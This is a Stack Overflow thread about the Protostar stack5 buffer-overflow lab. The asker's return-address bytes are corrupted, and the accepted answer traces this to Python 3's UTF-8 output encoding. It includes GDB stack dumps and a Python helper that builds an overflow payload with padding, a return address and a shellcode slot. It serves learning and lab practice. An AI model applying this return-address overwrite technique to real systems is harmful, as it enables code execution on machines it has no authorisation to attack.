Overflowed bytes different than those I see on GDB?

Question

I am trying to do the ProtoStar stack5 challenge. I know the solution (following a write up), but I am trying to come up with a different approach.

Here is the source code for the program we are trying to execute shellcode on:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

So just to see what is going on in the registers, I do the following:

(gdb) n
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
11      in stack5/stack5.c
(gdb) x/30x $esp
0xbffff750:     0xbffff760      0xb7ec6165      0xbffff768      0xb7eada75
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7b0:     0x41414141      0xbffff800      0xbffff85c      0xb7fe1848
0xbffff7c0:     0xbffff810      0xffffffff
(gdb) p $ebp
$1 = (void *) 0xbffff7a8
(gdb)

Good, I am overwriting the return address with 0x41414141, as expected. Now, what I want to do is make the return address point at the bytes immediately following it, so that the stack looks like this:

0xbffff7a8: |saved frame pointer| - |return address| - |shellcode part 1| - |...| - |shellcode part n|

However, when I write 76 bytes of 0x41 followed by the address 0xbffff7a8 + 4 (which I took to be 0xbffff7b0), the wrong bytes end up on the stack. Here is what I input:

41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141b0f7ffbf

Note that we are in a little endian system.

When I input this however (as ASCII), this is what I see on $esp and $ebp:

(gdb) n
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA°÷ÿ¿
11      in stack5/stack5.c
(gdb) x/30x $esp
0xbffff760:     0xbffff770      0xb7ec6165      0xbffff778      0xb7eada75
0xbffff770:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff780:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0xb7c3b0c2
0xbffff7b0:     0xbfc2bfc3      0xbffff800      0xbffff86c      0xb7fe1848
0xbffff7c0:     0xbffff820      0xffffffff ...
(gdb) p $ebp
$1 = (void *) 0xbffff7a8

As you can see, 0xb7c3b0c2 is written instead of the expected 0xbffff7b0.

Anyone know why this is?

NOTE: I realize that the address I actually wanted was 0xbffff7ac, not 0xbffff7b0. I will fix this, but it does not change the problem I am encountering.

@ChristianGibbons the point of using `gets()` is to cause the overflow. It's common example code to expose the flaw in accepting input without bounds checking (and all of the other things mentioned in that SO post). The "bad" usage of `gets()` is intentional. — Veridian Dynamics, Mar 12 '20 at 19:25
@VeridianDynamics I am aware of this. I am trying to use the overflow, but the bytes I find on the stack are different than the ones I inputted (see last part of question). — Gabe, Mar 12 '20 at 19:29
Ugh lol I responded to someone else who recommended you don't use `gets()`. They apparently deleted their comment. Can you show me how you're inputting your bytes? — Veridian Dynamics, Mar 12 '20 at 19:29
@VeridianDynamics No problem :) To get to $ebp + 0x4, I need 76 chars. So I input 'A' 76 times, and then I enter the ASCII equivalent of b0 f7 ff bf. Everything has the value I expect when I look at the stack in GDB, **except** the b0 f7 ff bf section. As you can see, 0xb7c3b0c2 is written instead. It is clearer at the end of the question if you need more info. Thanks for your reply! — Gabe, Mar 12 '20 at 19:35
@jwdonahue ```AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA°÷ÿ¿``` — Gabe, Mar 12 '20 at 19:58
Did you type them on the command line or pipe a file into it? I haven't done the math to check your byte alignments and my GDB-fu was never strong, but I am wondering if this is an encoding issue? — jwdonahue, Mar 12 '20 at 20:11
@jwdonahue Sorry for the delay. This happens whether I pipe it in from a Python script, pipe it in manually, or simply run the program and paste it. — Gabe, Mar 13 '20 at 05:03

score 0 · Accepted Answer · answered Mar 30 '20 at 00:13

I ended up posting this issue on LiveOverflow's subreddit and was pointed to this video by LiveOverflow.

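The video explains it much better than I can, but essentially Python 2 and Python 3 do not write escapes such as '\xb0' to stdout the same way. Python 3 treats the string as Unicode text and encodes it on output (UTF-8 in my environment), which turns every value above 0x7f into two bytes, while Python 2 writes the raw bytes unchanged.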
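
As a rough illustration (Python 3, assuming UTF-8 is the output encoding), the sketch below takes the four address bytes from the question, encodes them the way `print()` would encode a text string, and regroups the result into little-endian 32-bit words as `x/30x` displays them. The helper name `as_gdb_words` is made up for this example.

```python
import struct

# The four bytes the question meant to write: 0xbffff7b0, little-endian.
intended = struct.pack("<I", 0xBFFFF7B0)  # b'\xb0\xf7\xff\xbf'

# In Python 3, '\xb0\xf7\xff\xbf' is four Unicode characters, not four bytes.
# Printing it encodes each character; under UTF-8 every code point >= 0x80
# becomes a two-byte sequence.
as_text = intended.decode("latin-1")      # the str '\xb0\xf7\xff\xbf'
on_the_wire = as_text.encode("utf-8")

def as_gdb_words(data):
    """Group bytes into little-endian 32-bit words, like GDB's x/x output."""
    return [hex(word) for (word,) in struct.iter_unpack("<I", data)]

print(on_the_wire.hex())          # c2b0c3b7c3bfc2bf
print(as_gdb_words(on_the_wire))  # ['0xb7c3b0c2', '0xbfc2bfc3']
```

The two words are the same 0xb7c3b0c2 and 0xbfc2bfc3 that show up in the GDB dump in the question.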

I strongly encourage you to watch the video, as it explains this in depth.

This answer by @dsh to another question here on SO also explains it:

The byte-sequence C3 BE is the UTF-8 encoded representation of the character U+00FE.

Python 2 handles strings as a sequence of bytes rather than characters. So '\xfe' is a str object containing one byte.

In Python 3, strings are sequences of (Unicode) characters. So the code '\xfe' is a string containing one character. When you print the string, it must be encoded to bytes. Since your environment chose a default encoding of UTF-8, it was encoded accordingly.

How to solve this depends on your data. Is it bytes or characters? If bytes, then change the code to tell the interpreter: print(b'\xfe'). If it is characters, but you wanted a different encoding then encode the string accordingly: print( '\xfe'.encode('latin1') ).
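
For this payload the data is bytes, so one way to emit it from Python 3 is to skip the text layer and write to `sys.stdout.buffer`. This is a minimal sketch rather than a finished exploit: `build_payload` is a hypothetical helper, and the 76-byte offset and the address 0xbffff7b0 are simply the values from the question, which will likely differ on another setup.

```python
import struct
import sys

def build_payload(offset=76, ret_addr=0xBFFFF7B0, shellcode=b""):
    """Padding up to the saved return address, then the new address, then code.

    The defaults are the values from the question, not universal constants.
    """
    padding = b"A" * offset
    return padding + struct.pack("<I", ret_addr) + shellcode

if __name__ == "__main__":
    # sys.stdout.buffer is the underlying binary stream, so the bytes are
    # written exactly as given and nothing is re-encoded as UTF-8.
    sys.stdout.buffer.write(build_payload() + b"\n")
```

The output can be piped into the target program, or redirected to a file and fed to it inside GDB with `run < file`.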
